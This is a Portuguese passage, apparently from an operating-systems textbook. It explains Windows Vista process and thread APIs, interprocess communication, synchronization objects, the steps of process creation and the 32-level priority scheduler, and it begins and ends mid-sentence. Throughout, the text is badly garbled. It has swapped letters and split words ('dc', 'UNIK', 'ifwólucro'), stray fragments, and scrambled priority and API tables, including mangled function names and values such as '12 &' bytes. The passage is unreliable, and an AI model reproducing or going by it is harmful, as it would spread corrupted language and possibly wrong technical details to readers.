outros fonnarn o tanque dc threads operarios quc sao atri- 
bufdos para rcalizar tarefas curtas cspccificas ddegadas por 
componcntcs do cxecutivo ou drivers quc prcciscm rea- 
lizar algum scrvięo no processo de sistema* 

11.4.21 Chamadas API de gerenciamento 
de ta ref a, processo, thread e 
fiiamento 

Os noYos processos sao criados u san do a fimęao da API 
do Win 32 CreatePtocess, Essa funęao tcm mu i los para met ros c 
varias opęoes, Ela leva o nome do arquivo a ser executado, as 
cadeias dc caracteres de linhas dc comando (nao aiialisadas) 
e um poniciro para as cadeias de caracteres dc ambiente. Ha 
tambem flags c valorcs quc controlam muli os dctalhes, como 
o modo quc a seguranęa e configu rada para o processo c o 
primeiro thread, conJiguraęoes de depurador e propriedades 
de escalonamento* Um sin a li zador tambem espedfica quan- 
do desaitores abertos no criador dcvcm ser passados para o 
novo processo* A funęao tambem recebc o diretório de fun- 
ckma men to atual do novo processo c u ma estru tura de dados 
oprional, com informaęoes sobrc a GUI do Windows que o 
processo vai iisar* Em vez dc retomar apenas um ID para o 
novo processo, o Win32 retorna descritores c EDs, tamo para 
o novo processo ąuanto para scu thread inicial* 

O gran dc mlmero tle parametros revela unia serie dc 
diferenęas do processo de criaęao do UNIK, 

L A rcai pcsquisa de caminho para encontrar o pro- 
grama a ser executado e enterrada no código dc 
biblioicca para o Win32, mas gerendada de forma 
mais explicita no UNIK. 

2, O diretório de trabalho atual e um conceito do 
modo miclco no UNIX, mas urna cadeia de caracte- 
res do modo usuario no Windows* O Windows na 
verdadc atirc um manipulador no diretório atual dc 
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cada processo, com os mesmos efeitos irritames do 
UNIK: nao se pode deletar o diretório, a nao ser que 
aconteęa de ele estar em outro porno da rede, po- 
dendo, nesse caso, ser deletado. 

3. O UNIX analisa a linha de comando e passa um ve- 
tor de parametros, enquanto o Win32 deixa a analise 
dc argumentos para o programa individual. Como 
conseąiiencia, programas diferentes devem tratar 
caracteres curinga (por exemplo, *.txt) e outros 
stmbolos cspeciais de urn modo inconsistente. 

4. Se os descritores dc arquivos pudem ou nao ser 
herdados no UNIX e unia propriedade do descritor, 
No Windows e u ma proprkdade tanio do descritor 
quanto d o para metro para a criaęao do processo. 

5* O Win32 e orientado por GUI; logo, novos proces¬ 
sos rccebem, dc forma direla, inforniaęoes sobre 
sua janeia primaria, ao passo que essa informaęao 
ó passa da como parametros para aplieaęóes de GUI 
no UNIK, 

ć, O Windows nao tcm um bil SETUID como urna pro¬ 
priedade do exccutavc1, mas um processo pode criar 
outro que seja executado como um usuario diferen- 
te, desde que possa obter unia token com as creden- 
ciais daquclc usuario. 

7. O descritor de processos de threads re tornado pelo 
Windows pode ser usado para modifkar o novo 
processo/thread de varias formas significarivas, in- 
cluindo duplicaęao dc threads e configuraęao de 
variavris de ambiente no novo processo* O UNIX 
apenas faz m od i li ca ęó es ao novo processo entre as 
chamadas fork e exec. 

Algumas dessas diferenęas sao históricas e filosóficas* 
O UNIK foi projetado para ser orient ad o a linha de coman¬ 
do cm vcz dc ser orientado a GUI, como o Windows. Os 
u sua-rios do UNIK sao mais solisticados c cmcndcm con- 
ceitos como variaveis PATH, O Windows Vista herdou mtli¬ 
ło do legado do MS-DOS. 

A comparaęao lambem e distorcida porque o Win32 e 
um ifwólucro do modo usuario em tor no da execuęao nati- 
va dc processos do NT, assirn como as funęóes da biblioteca 
system envolvem fork/exec no UNI'X, As chamadas dc sistema 
reais do NT para criar processos e threads, NtCreateRrocess 
e NtCreateThread, sao muito mais simples do que as versóes 
do Win32. Os parametros principais de criaęao de processos 
do NT sao um manipulador em urna seęao representando o 
arquivo de programa a ser exeaitado, mu sinalizador espe- 
clficando quando o novo processo deve, por pa dra o, herdar 
manipuladores do criador e parametros rei a don a dos ao mo- 
ddo de seguranęa, Todos os detalhes dc configuraęao das ca- 
deias de caracteres de ambiente, e a criaęao do thread inicial, 
sao deixados para o código do modo usuario, que pode usar 
o manipulador no novo processo, manipular seu espaęo de 
endcreęamento virtual dc forma direta. 
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Para dar suporte ao subsistema PQSiX, a criaęao nativa 
de processos leni urna opęao de criar um novo processo co- 
piando o espaęo de enttereęamento virtual de outro processo 
em vc 7 , de raapear urn objęto de seęao para um pr ogra ma 
novo. Isso $6 e usado para implementar a fork para o PO 
$IX, enaopeto Win32. 

A criaęao de threads passa o coiuexto da CPU para ser 
osado pelo novo thread (o que in du i o ponteiro de pilha e 
o ponteiro de insiruęao inirial), um modelo para o TEB, e 
urna flag dizendo se o thread deve ser executado de i me¬ 
dia to ou criado em um estado de suspensao (esperando al- 
guem cha mar NtResumeThread em seu descritor). A cria¬ 
ęao da pilha do modo usuario e a passagem dos parametros 
argv/ar$c sao deixadas para o co di go do modo usuario cha- 
mando as APls natiyas de gercnciamcnio de mcmória do 
NT no descritor do processo. 

No lanęaniemo do Windows Vista, urna nova A Pi na- 
tiva para processos foi inchuda, combinando a criaęao de 
processos com a criaęao do thread inicial. A razao para a 
muda nęa foi para dar suporte ao uso de processos como 
limites de seguranęa, Norma Imente, todos os processos 
triad os por um usuario sao considerados confiaveis dc ma- 
ncira igual. £ o usuario, assiru como representado por urna 
tok en, que tictermina on de esta o limite de confianęa. Essa 
m uda nęa no Windows Vista permite que os processos tam- 
bem ofercęam limites dc confianęa, mas isso significa que 
o processo criador nao tem dirdtos suficie] U es com relaęao 
a um descritor de um processo novo para implementar os 
deLalhes da criaęao do processo no modo usuario. 

Comunicaęao entre processos 

Os threads podem se co ni u ni car de miii las maneiras, 
erure elas pipes, pipes nomeados, mailslots, soąuetes, cha- 
madas de procedimento remotas e arquivos cornpartilhados. 
Os pipes tem dois modos: bytes e mensagens, sclcdonados 
no monie lito da criaęao. Os pipes no modo byte funcionam 
como no UN1X, Os pipes no modo de mensagem sao bas- 
taiue parecidos, mas preservam as fronteiras da mensagem, 
de modo que q Liano escriias de 12 & bytes serao lidas como 
qualro mensagens de 12S bytes, e nao como urna mensa- 
gem de 512 bytes, como acoiuece com os pipes no modo 
byte. Existem tambem os pipes nomeados e que tem os 
mesmos dois modos dos pipes normais. Os pipes nomeados 
tambem podem ser usados em rede; os normais, nao. 

Os mailslots sao unia caracteristica do sistema opera- 
cional OS/2 impkmentada no Windows para compatibili- 
dade* De unia certa maneira, sao similares aos pipes, mas 
nao ideniicos. Urna diferenęa: eles sao de apenas u ma via, 
enquanto os pipes sao de via dupla. Eles tambem podem 
ser usados em unia rede, mas nao dao garamia de entrega. 
Por firn, pemiitem que o processo emissor difunda uma 
mensagem para diversos recept ores, em vez de para apenas 
um, Tan to os mailslots ąuanto os pipes com nome sao im- 
plemcntados como sistemas dc arquivos no Windows, em 
vcz de funęoes do eKecutwo. Isso permite que sejam aces- 


sados pela rede usando-se osproiocolos remotos de sistema 
de arquivos existentes. 

Os soąuetes sao como os pipes, só que cm gera] eon ce¬ 
la m processos de maąumas diferentes. Por exemplo, um 
processo escreve em um soquete e outro, cm uma maqui- 
na remota, le a partir desse soąuete. Os soąuetes tambem 
podem ser usados para coneciar processos de uma mesma 
maąuina, mas, como ocasionam maior sobre ca rga que os 
pipes, eles sao geralmente usados somente no contexto 
de redes. Os soąuetes Foram projetados, no imrio, para o 
Berkeley UNIX, e a implcinentaęao tornou-se de ampla 
disponibilidade. Algum dos códigos c estru tu ras de dados 
do Berkeley ainda estao presentes no Windows hojc, como 
reconhccido nas anotaęoes dc lanęamcnto do sistema. 

As RFCs (chamadas de procedimento remotas — remote 
procedurę ca!Is) pemiitem que um processo A faęa com que 
um processo B cha me um procedimciuo no espaęo dc en- 
dereęamento de & a pedido de A e ret orne o rc suita do para 
A. Existeni varias resirięoes aos parametros. Por exemplo, 
nao faz sentido passar um ponteiro para um processo dife- 
rentę, de forma quc as estruturas de dados devem ser pos¬ 
ła s cni pacotes c transmitidas dc uma forma independente 
do processo, A RPC ć dc modo geral impkmentada como 
uma camada de abstraęao acima da camada dc transpor¬ 
tu. No caso do Windows, o transporte pode ser soąuetes 
TPC/IP, pipes nomeados ou ALPC. A ALPC (chamada avan- 
ęada dc proce di men to local — advmced local procedurę cali) e 
um rccurso de cnvio de mensagem no exccmivo do modo 
nucleo. Ś aperfeięoada para conumięaędes entre processos 
na maąuina local e nao opera em rede. O p roje to basico e 
o envio de mensagens ąuegeram respostas, implernemali¬ 
do uma versao leve dc cha ma da dc procedimento remo- 
ta, sobrc a qual o pacotc dc RPC pode ser consmiido para 
f orne cer um conjunto mais rico dc funcionalidadc do quc 
o disponwd na ALPC. Esta e implementada usando uma 
combinaęao de cópia de parametros e alocaęao tempora- 
ria de rnemória compariilhada, baseada no tamanho das 
mensagens. 

Por firn, os processos podem dividir objetos. Isso inclui 
objetos de seęao, que podem ser mapcados no espaęo dc 
endereęamento virtual de processos diferentes ao mesmo 
tempo. Todas as gravaęóes fcitas por u ni processo aparc- 
cem, en tao, no espaęo de endereęamento dos outros pro¬ 
cessos. Usando esse mecanismo, o buffer compartilhado 
utilizado em problemas de consumidores-produtores pode 
ser i nip leniem a do de forma fadl. 

Sincronizaęao 

Os processos tambem podem usar varios tipos de obje¬ 
tos de sincronizaęao. Assim como o Windows Vista fornece 
numerosos mecanismos de comunicaęao entre processos, 
cle tambem ofcrece varios mecanismos dc sincronizaęao, 
induindo semafor os, mutexcs, regioes criticas e even- 
tos* Todos esses mecanismos funcionam com os threads e 
nao com os processos, de modo quc, ąuando um ibread e 




Sn#w 


bloqneado em um semafor o, outras threads no mesmo 
processo {se houver algum) nao sao afetados e podem con- 
tinuar sua exeaięao. 

Um semafora e criado usando a funęao GeateSemaphore da 
A PI do Win 32, que pode inicializa-Io para um valor da do 
e definir um vaIor inaximo tambem. Os semaforos sao ob¬ 
jęłoś do modo nudeo e, por essa razao, leni desentores de 
seguranęa e manipuladores* O manipulador de um senici- 
foro pode ser duplicado usando DuplicateHandle e passa do 
para outro processo de modo que varios processos possani 
ser sineronizados pelo mesmo semaforo. Um semafora 
tambem pode reccbcr um nonie no espaęo de nomes do 
Win 32 e ter u ma ACL eon figura da para sua proieęao, AJ- 
gumas vezes compartilhar um semaforo pelo nonie e niais 
apropriado que duplicar o manipulador. 

Chamadas para up e down existem, contudo elas tętn 
os nomes um pouco estranhos, ReleaseSemaphoro (up) e 
WaitForSingleObject (down). Tambem e possivd definir um 
tempo para que a cham a da WaitForSingleObject expire, 
para que o thread que a esteja realizando possa ser libera - 
do eventualmente, ainda que o semaforo permaneęa em 
0 (cm bora temporizadores rei m rodu za in as disputas). As 
cha mad as WaitForSingleObject e WaltForMuStipleObjects sao as 
interfaces comuns usadas para esperar pelos objetos des- 
padiames discutidos na Seęao 11.3. Ainda que pudesse icr 
sido possivd envolver a vcrsao de um unico objęto dessas 
A Pis em u m itwóluero co ni um nonie de alguma forma 
mais pareddo com um semaforo, muitos threads usam a 
versao de muitos objetos, quc pode induir a espera por va- 
rias formas de objetos de sincronizaęao, bem como outros 
eventos como finalizaęao de processos e threads, condusao 
de operaęoes dc E/S e a disponibllidadc de mensagens em 
portas e soąuetes. 

Os mutexes tambem sao objetos do modo nudeo usa- 
dos para sincronizaęao, contudo mais simples que os se¬ 
maforos porque nao tern comadores. Hles sao, na csseneia, 
travas com funęoes A Pt para travamcnto WaitForSingleObject 
c destravaniemo ReleaseMutex. Como os desentores dc se¬ 
maforos, os desentores de mutexcs podem ser duplicados 
e passados emre processos para que threads em processos 
diferemes possani acessar o mesmo mutex. 

Um lerceiro mecanismo de sincronizaęao e chama do 
de seęoes criticas, que implementa o eon celt o de regides 
criticas. Eles sao slmilares aos mutexes no Windows, com 
a diferenęa de que sao locais para o espaęo de endereęa- 
mento do processo criador. Como as seęoes criticas nao sao 
objetos do modo nudeo, elas nao tern manipuladores explf- 
citos ou desentores dc seguranęa e nao podem ser passadas 
entre processos. O travamento e destravamento sao feitos 
com EnterCriticalSection e LeaveCriticalSection, rcspeciivamen¬ 
ie. Como cssas funęoes da APT sao realizadas, dc imcio, no 
espaęo do usuario e só fazem chamadas ao nudeo ąuando 
um bloqueio e necessario, das sao niuito mais rapidas quc 
os mutexcs* As seęoes criticas sao otimizadas para combi- 
nar espera ocupada (cm multiprocessadores) com o uso 
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de sincronizaęao de nudeo apenas quando necessario. Em 
muitas aplicaęoes a maior parte das seędes criticas e tao 
rata me me disputada ou existe por penodos tao curtos que 
nunca e necessario alocar um objęto de sincronizaęao do 
nudeo. Isso rcsulta cm economias significativas dc memó- 
ria do nudeo* 

O ultimo mecanismo de sincronizaęao que discuthnos 
usa objetos do modo nudeo chamados dc eventos. Como 
descreveinos anteriormente, ha dois tipos: eventos de no- 
tifkacao e eventos de sincronizaęao. Um evento pode 
estar em um dc dois estados: sinalizado c nao sinalizado. 
Um thread pode esperar para um cvcnto ser sinalizado com 
a chamada WaitForSingleObject. Sc um outro thread sinaliza 
um evcnto com a chamada SetEvent, o quc acontecc depen- 
de do tipo de evento. Com um evenlo de notificaęao, todos 
os threads em espera sao liberados e o cvento permanece 
configu rado ate que seja desmarcado, de forma manuał, 
com a ResetEvent. Com um evento de sincronizaęao, se um 
ou mais threads estao esperando, apenas um thread e iibe- 
rado e o evento e desmarcado. U ma opera ca o altemativa e 
a PufseEvent, que e como a SetEvent, com a diferenęa de que, 
se nao houver ninguem esperando, o pulso e perdido e o 
cvcnto, desmarcado. Em contraste, um SetEvent quc acon- 
tcęa sem que baja threads esperando ć Icmbrado por dcixar 
o evento sinalizado, de modo quc um thread subseąucrtte 
que chanie u ma chamada A PI de espera para o evento nao 
vai esperar na verdade, 

O mimero de chamadas API do Win 32 lidando com pro¬ 
cessos, threads e fi lament os e próximo dc 100, e urna parte 
substandal disso lida com 1PC de mna forma ou dc outra. 
Um resumo das chamadas discutidas amcriomicntc, bem 
como de outras importantes, c apresentado na Tabela 1 1.14* 

Notę que nem todas essas sao apenas chamadas de 
sistema. Enquanto algumas sao invólucros, outras contem 
código significativo de bibliotecas que mapeia a semantica 
do Win32 para as APIs nativas do NT, Alem dessas, outras, 
como as APIs de filamentos, sao puramente funęoes do 
modo usuario sobi e filamentos e sao implementadas, em 
sua tolalidade, por bibliotecas do modo usuario* 

_ 11.4.51 Implementacjo de processos e 

threads 

Nesta seęao enirarcmos em mais detalhes sobre como 
o Windows eria um processo (e o thread inicial), Como o 
Win32 c a interface mais docu men lada, comeęaremos com 
ele, mas chegaremos dc forma rapida ao nudeo e enien- 
deremos a implementaęao da chamada de API nativa para 
a criaęao de mu novo processo. Ha muitos outros deta¬ 
lhes especilicos que cobrireinos aqui, por exemplo como o 
WOW16 c o WOW64 tern código especial para o caminho 
de criaęao, ou como o sistema ofercce correęoes espccificas 
para aplicaęoes com o objctivo de contornar pequcnas in- 
compalibilidades e en os latenles* Focaremos os ca mi nh os 
prindpais de código que sao cxecutados sempre quc os pro- 
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Funęao da AP1 do Win32 

Descrięao 

CreateProcess 

Cria um novo processo 

CreateThread 

Cria um novo thread em um processo existente 

CreateFiber 

Cria um novo filamento 

ExitProeess 

Finaliza o processo atuai a todos os sens threads 

ExitThread 

Rnaliza este thread 

ExitFiber 

Rnaliza estefilamenio 

SwilchToFiber 

Executa um fi lam anto diferente no thread atual 

Set Priorit yClass 

Configura a classe de priorictade de um processo 

SetThreadPriority 

Config u ra a prioridade de um t hread 

CreateSemaphore 

Cria um novo semśfora 

CreateMutex 

Cria um novo mutex 

OpertSemaphore 

Abre um semafora existenle 

OpenMutex 

Abre um mutex existente 

WaitForSingleObject 

Bloqueia em espera por um unico semafora, mutex etc. 

WaitForM u Ili pleGbj ec ts 

Bloqueia em es pora por um conjunio de objetos, dados os seus descritores 

PulseEvent 

Configura um evento para sinalizado, depois para nao sinalizado 

ReleaseMutex 

Libera um mutex para que outro thread possa utilizś-lo 

ReleaseSemaphore 

Aumenta o contador do semśfora em 1 

EnterCriłicafSection 

Obtem a trava em uma seęao chtica 

LeaveCriticalSection 

Libera a trava em uma seęao critica 


I Tabela 11.14 Algumas das chamadas do Win32 para gerenciar processos, threads e filannentos, 


ccssos sao criados, bem como aprcsenlarcmos alguns dos 
detalhes que completam lacunas no quc vimos ale aqui. 

Um processo e criado quando outro processo realiza a 
chama da do Win 32 CreateProcess. Essa cha mada invoca um 
procedimenio (do modo usuarLo) na kerneI32dll que cria o 
processo em uma succssao dc ctapas usando varias chama¬ 
das dc sistcma c rcalizando out ras opera ęoes, 

1. Converte o nonie do arquivo executavel da do 
como para metro dc um caminho do Win 32 para 
um caminho do NT. Sc o cxccutavcl tem apenas um 
nomc sem um nonie dc diretório, de ć pesquisa- 
do nos diretórios listados nos diretórios-padrao 
(que meluem, mas nao sao limitados a, aąucles na 
variavel PATII no ambiente). 

2. Empacota os parametrom da criaęao do processo e os 
enirega, com o caminho completo do programa 
exęcmavd, para a cha ma da A PI naiiva NtCreate 
UserPracess. (Essa A PI foi a diet on a da a o Windows 
Vista para que os detalhes da criaęao de processos 
pudessem ser tratados no modo nucleo, permitindo 
aos processos serem usados como um limite de eon- 


iianęa. As APIs nativas ameriores, cxplicadas amc- 
rionnente, ainda existem, mas nao sao mais usadas 
pda cha ma da CreateProcess do Win 32*) 

3. Scndo executada no modo niidco, a NtCreateUser- 
Process processa os parametrom e entao abre a i ma¬ 
gom do programa e cria um objęto de seęao que 
pode ser usado para mapear o programa no espaęo 
de endereęamenio vlrtual do novo processo. 

4. O gereodador de processos aloca e inicializa o obję¬ 
to de processos (a estrutura de dados do nucleo que 
representa um processo para as camadas do nucleo 
e executiva). 

5. O gerenciador de memória cria o espaęo de endere- 
ęa niemo- para o novo processo alocando e iniciali- 
zando os direiórios de pagina e os identificadores de 
endercęo virtual que desereveni a poręao do modo 
nucleo, incluindo as reglóes espccificas de proces¬ 
sos, como a entrada do diretório dc pagina dc au- 
tomapeamento quc da a cada processo no modo 
nucleo accsso as paginas ffsicas dc toda a su a tabela 
dc paginas usando cndereęos vhtuais do nucleo* 
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(Descreveremos o automapeamento em inais deia- 
Ihes na Seęao 11.5.) 

6. lima tabela de descriiores e criada para o novo pro¬ 
cesso, e todos os descriiores do chamador que sao 
possfveis de serem herdados sao copiados para ela. 

7. A pagina companilhadą do usuario e mapeada, e o 
gerendador de memória iniciallza as estmturas de 
dados do conjnnto de trabalho usadas para decidir 
quais paginas devem ser aparadas de urn processo 
qnando a memória Esica estiver baixa* Os pedaęos 
da imagom cxeeutavd representados pdo objęto de 
seęao sao mapeados para o espaęo de endereęamen- 
to do modo usuario do novo processo, 

8. O executivo tria e inicializa o Bloco do Ambicme do 
Processo (PEB — process enwenment hlcck), que e usa- 
do lamo pdo modo usuario ąuanto pdo modo nudeo 
para manier informaęoes de estado por todo o pro¬ 
cesso, como os pomeiros de monie do modo usuario 
e a lista de bibliotecas carregadas (DLLs). 

9. A memória virlual e alocada no novo processo e 
usada para passar parametros, induindo as cadeias 
de caracieres do ambieme e linlias de comando. 

10. Um ID de processo e alocada da tabela especial de 
manipuladores (labela de ID) que o nudeo mantem 
para alocar de forma eficiente IDs locais linicos para 
processos e threads. 

11. Um objęto de llircad ć alocado c inidalizado. Uma 
pil ha do modo usuario c alocada com o Btoco dc 
Ambicme dc Thread (TEB — thread amronmem 
hiock ), O regislro CONTEKT que eon te m os valores 
iniciais do thrcad para os registradores da CPU (in- 
duindo os pomeiros dc instruęao c pilha) 6 inieta- 
łizado, 

12. O objęto de processo e adicionado a lisia global de 
processos. Descriiores para os objetos de processo 
c threads sao alocados na tabela de descriiores do 
chamador, Um ID para o iliread inicial e alocado da 
tabela de IDs. 

13. NtCreateUserProcess reiorna ao modo usuario com 
o novo processo triado, contendo um unico thrcad 
pronto para ser execulado, mas suspenso. 

14. Se a APJ do NT falha, o código do Win32 verifiea se 
esse pode ser um processo perlencenie a outro su Li¬ 
sto enia como W0W64, ou talvez o próg rama seja 
marcado para quc seja cxecutado sob o depurador. 
Esscs casos especiais sao traiados com codificaęao 
especial no código do modo usuario, CreateProcess. 

15. Sc a cha ma da NtCreateUserProcess fol bem-succdi- 
da, ainda ha algum trabalho a ser fcito. Os pro¬ 
cessos do Win32 devem ser registrados com o 
processo de subsislema do Win32, csrss.exe. A bi- 
blioteca Kernel32.dll envia uma mensa gem para o 
csrss falando sobre o novo processo com os deser!- 
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lores do processo e do thread para que ele pos- 
sa se duplicar. Os processos e threads sao incluf- 
dos nas fabetas dos subsisiemas para que des 
tenham uma lista completa de todos os processos e 
threads do Win32. O subsislema entao exibc um 
cursor contendo um ponteiro com uma ampulhcia 
para dizer a o usu ario quc alguma coisa esta ocor- 
rendo, mas que o cursor pode ser usado enąuanio 
isso. Quando o processo faz su a primcira cha mada 
de GUI, dc modo geral para criar uma janela, o 
cursor e removido (ele expira depois de dois se- 
gundos se nenhuma cha mada e recebida). 

16. Se o processo ć restrito, como um Internet Explorcr 
dc baixos dirdtos, a token i modificada para res- 
tringir ąuais objclos o novo processo pode acessar. 

17. Se a aplicaęao foi marcada como precisando ser 
adaptada para exeanar cm compatibilidadc com a 
vcrsao atual do Windows, as adaptaęoes cspecificadas 
sao aplicadas, (Adaptaęocs de modo geral envoivem 
chamadas de bibliotecas para modificar sen com- 
p on a men to de forma su per fi ciał, como retor nar um 
nurnero dc ver$ao falso ou airasar a liberaęao de 
memória.) 

18. Por firn, chama a NtResumeThread para tirar o llircad 
da suspensao e reiorna a esirumra para o chamador 
contendo os IDs e os descriiores para o processo e o 
llircad quc acabaram de ser criadoś, 

Escalonamento 

O niiclco do Windows nao tern um thread de escalona- 
mento central. Em vez disso, ąuando um thread nao pode 
inais exeaitar, o thread entra no modo nudeo c cxcaiia ele 
mesmo o escalonador para verilicar qual thread devc ser 
cxecutado. As condięoes a seguir lazcm com que o llircad 
cni execuęao excauc o código do escalonador: 

L O thread atualmente em execuęao bloąueia cm um 
semafora, mutex, evento, E/S etc. 

2. Ele sinaliza um objęto (por exemplo, faz um up em 
um semafora ou faz com que um evento seja sina- 
lizado), 

3. O quantum do thread cm execuęao expira. 

No caso I, o thread ja esta cxccutando no modo nudeo 
para realizar a operami o no despachantc ou objęło dc E/S, 
Como provavelmente nao podera coniinuar executando, ele 
executa o código do escalonador para quc cscolha scu succs- 
sore carregue CONTEXTpara inicializar sua execuęao. 

No caso 2, o ifiread executa tambeni no modo nudeo. 
Gontu do, depois de sinalizar algum objęto, ccrtamcnte de 
pode prosseguir, pois o ato de sinalizar um objęto nunca 
cria bloąueios, Ainda assim, o thread predsa executar o 
escalonador e verificar se o resuitado de sua aęao liberou 
um Lhread de prioridade mais alta e que esteja, agora, !i- 
vre para executar. Se a aęao foi liberada, ocorre uma al- 
ternancia de thread, pois o Windows e completamente 
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preemptivo (isto e, as alternandas de ihreads podem ocor- 
rer a qualquer momento H nao apenas no firn do quantum 
do thread em execuęao). Entretanto, no caso de um mul- 
tiprocessador, lim thread que tenha ficado pronto pode 
ser cscalonado para uma CPU diferente e o thread odgi¬ 
nał pode continuar sendo cxccutado na CPU atual, mesmo 
tendo prioridadc inferior, 

No caso 3, ocorre uma interrupęao para o modo nu- 
deo; nesse momento, o thread executa o código do esca- 
lonador para verificar quem e o próximo a executar. De- 
pendendo de quais sejam os outros threads que estejam 
esperando, o mesmo thread pode ser seiecionado e, desse 
modo, ele obtem um novo quanmm c prossegue cxccu- 
tando. Caso contra rio, ocorre uma alternaiicia de thread, 

O escalonador tambem e chama do sob outras duas 
condięoes: 

1. Uma opera ęao de E/S ter mi na. 

2. Uma espera teiuporizada expira. 

No primeiro caso, um thread pode esiar esperando 
uma operaęao de E/S e eniao ser liberado para executar Ć 
preciso v en.li car se esse thread deveria causar preempęao 
no thread em ex ecu ęao, pois nao ba a garantia de um tem¬ 
po rnihimo de execuęao. O escalonador nao e executado 
no próprio trata dor da interrupęao (pois isso poderia man¬ 
ier as imerrupęoes desligadas por muito tempo). Em vez 
disso, um DPC e colocado na fila nm pouco rnais tarde, de- 
pois que o trat amen to da interrupęao termina. No segundo 
caso, urn thread emitiu um down em um semaforo on łoi 
bioqueado por algum outro objęto, porem por um tempo 
maximo que acaba de expirar Novamente e necessario que 
o trata dor de interrupęao coloąue o DPC na fila, para evitar 
que de execute durante o tratamento de interrupęao do 
relegio. Se um thread ficar pronto ate a expiraęao desse 
tempo maximo, o escalonador sera executado e, se o novo 
thread possui uma prioridade mais aha, o thread a utai so¬ 
fie uma preempęao como a do caso 1. 

Agora chegamos ao algoritmo real de e scal ona mento. 
A APJ Win32 fornece dois ganchos para os processos in- 
fluenciarem o escalonamento de threads, Primeiro, ha uma 
cha mada SetPriorityCfass que define a classe de prioridade de 
todos os threads no processo de quem chamom Os valores 
permitidos sao: tempo real, aha, aciina do norma!, normal, 
abaixo do norma! e ociosa. A classe de prioridade determi- 
na as prioridades relativas do processo. (Comeęando pelo 
Windows Visia, a classe de prioridade do processo tambem 
pode ser utilizada por um processo que queira temporaria- 
mente marcar-se como segundo piano, o que significa que ele 
nao ira interferir em nenhuma outra atMdade do sistema.) 
Observe que a classe de prioridade e criada para o proces¬ 
so, mas acaba a feta nd o a prioridade atual de cada um dos 
threads no processo por meto da configu ra ęao de uma prio- 
ridade-base atribuida a cada thread quando de sua criaęao. 

Em segundo lugar, ha uma cha mada SeiThread Priori- 
ty que define a prioridade relativa de alguns threads (pro- 


vaveimente, mas nao necessariamente, do thread que cha- 
mou) comparados aos outros threads de seu processo. Os 
valores permitidos sao: tempo crftico, mais aha, aciina do 
norma!, norma], abaixo do normal, mais baixa e ociosa. Os 
threads marca dos como de tempo eritico obtem a mais alfa 
prioridade dc escalonamento em tempo nao real, enquan- 
to threads ociosos recebem a prioridade mais baixa, inde¬ 
pendent eme nic da classe de prioridade. Os outros va)ores 
de prioridade ajustam a prioridadc-basc de um thread com 
relaęao aos valores normais definidos pela classe dc priori¬ 
dade (+2, +1, 0, -1, -2, respectwamente). O uso de classes 
de prioridade e prioridades relaiivas para os threads fazem 
com que as aplicaęóes decidam com maior facilidade quais 
prioridades especificar. 

O escalonador fundona da seguinte maneira: o siste- 
ma tem 32 prioridades, numeradas de 0 a 31. As combi- 
naęoes de classes de prioridades e prioridades relativas sao 
mapeadas sobre as 32 prioridades absolutas dos threads de 
acordo com a Tabela 11.15. O mimero na tabela determi- 
na a prioridade-base do thread, Alcm disso, todo thread 
tem uma prioridade atual, que pode ser mais aha (mas 
nao mais haixa) que a prioridadc-base c que discutircmos 
resumidamenie. 

Para usar essas prioridades no escalonamento, o sis- 
tema mantem um vetor com 32 listas de threads, corrcs- 
pondentes as prioridades 0 a 31, derh adas da Tabela 11,15. 
Cada lista eon tem um conjunto de threads prontos defini¬ 
dos como sendo da prioridade corrcspondentc, O algorit¬ 
mo basico de escalonamento consiste em buscar no vctor, 
desde a prioridade 31 ate a prioridade 0. Assim que uma 
prioridade que nao estiver vazia for encontrada, o thread 
no inicio da fila sera seiecionado e executado por um quan- 
tum, Se o quaruum expira, o thread vai para o finał da fila 
de seu nfvel de prioridade e o thread da frenie e escolhi- 
do como o próximo. Em outras palavras, quando ha varios 
threads prontos no mvd de prioridade mais aha, eles exe- 
cmam circularmcntc, com um ąuantum cada, Se nenhum 
thread esiiver pronto, o processador fica ocioso, ou seja, e 
definido para um nivd mais baixo de energia e espera que 
uma interrupęao ocorra. 

E preciso observar que o escalonamento e feilo csco- 
Ihendo-se um thread, sem a preocupaęao emu o processo 
ao qual ele pertence, Desse modo, o escalonador mot sco- 
Ihe rnn processo e depois um thread para aąuele proces¬ 
so. Ele somente verifica os threads. Ele nao considera qual 
thread pcrtence a qual processo, exceto para deterrninar se 
tambem preciso alternar espaęos de endereęamento quan- 
do trocar de thread. 

Para aumentar a escalabilidade dos algoritmos de esca¬ 
lonamento em ni uh [processador es com uma grandę quan- 
tidade de processadores, o escalonador tenta nao bloąuear 
a lrava que sineroniza o acesso ao vetor global de listas de 
prioridade. Em \^ez disso, ele veriflca se pode despachar 
diretamente para o processador adequado um thread que 
esteja pronto para exeeuęao. 
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Classe de prioridades de processo Win32 



Tempo real 

Afta 

Ac im 3 do normal 

Normal 

Abaixo do normal 

Ociosa 


Tempo critico 

31 

15 

15 

15 

15 

15 


A mais alta 

26 

15 

12 

10 

8 

6 

Propriedades 
de thread 

Win32 

Ad ma do norma 1 

25 

14 

11 

9 

7 

5 

Normal 

24 

13 

10 

8 

6 

4 


A bako do normal 

23 

12 

9 

7 

5 

3 


A mais baka 

22 

11 

8 

6 

4 

2 


Ociosa 

16 

1 

1 

1 

1 

1 


i Ta be la 11.15 Mapeamento das pri oridades Wi n3 2 em priori dades Windows. 


Para ca da tlircad, o escalonador mantem u ma kicia de 
processador ideał e, semprc que pos$ivcl, tema agendar o 
thread para csse processador. Isto aumenta o desempenho 
do sistema, pois e mais provavel que os dados uiilizados 
por urn thread csiejamannazenados na ca che do processa¬ 
dor ideał O escalonador sabe dos multiprocessadores nos 
ąuais cada CPU tern sua própria memória e pode executar 
pr ogra mas arrnazenados em qualquer memória — com u m 
custo ąuando a memória na o e local. Esses sistemas sao 
denominados niaąuinas NUMA (maqumas de acesso nao 
umtbrme a memória). O escalonador tenta otimizar a 
colocaęao dos threads nessas maąumas. O gcrenciador de 
memória lenta alocar paginas fisicas no nó NUMA porte li¬ 
ce nte ao processador ideał para os threads quand.o sof rem 
falia de pa giną, 

O vetor de cabeęalhos de filas e most rado na Figura 
11.13. A figura mosira que, na verdadc, ha quatro cate- 
gorias do prioridades: tempo real, usuario, zero o ociosa — 
que na verdack vale -1. isso merccc urn comemario. As 


prioridades 1 ó a 31 sao chamadas do tempo real e tom a in- 
tenęao do criar sistemas que satisfaęam resirięocs de tempo 
real como as do prazo, Threads com prioridade de tempo rea! 
sao executados antes de todos os outros, exceto de DPCs e 
iSJRs. Se unia aplicaęao em tempo real deseja ser exccuta- 
da, ela pode solid lar <lrivers de dispositivos que tomem o 
cuidado de nao cxecmar DPCs e ISRs por nenhum tempo 
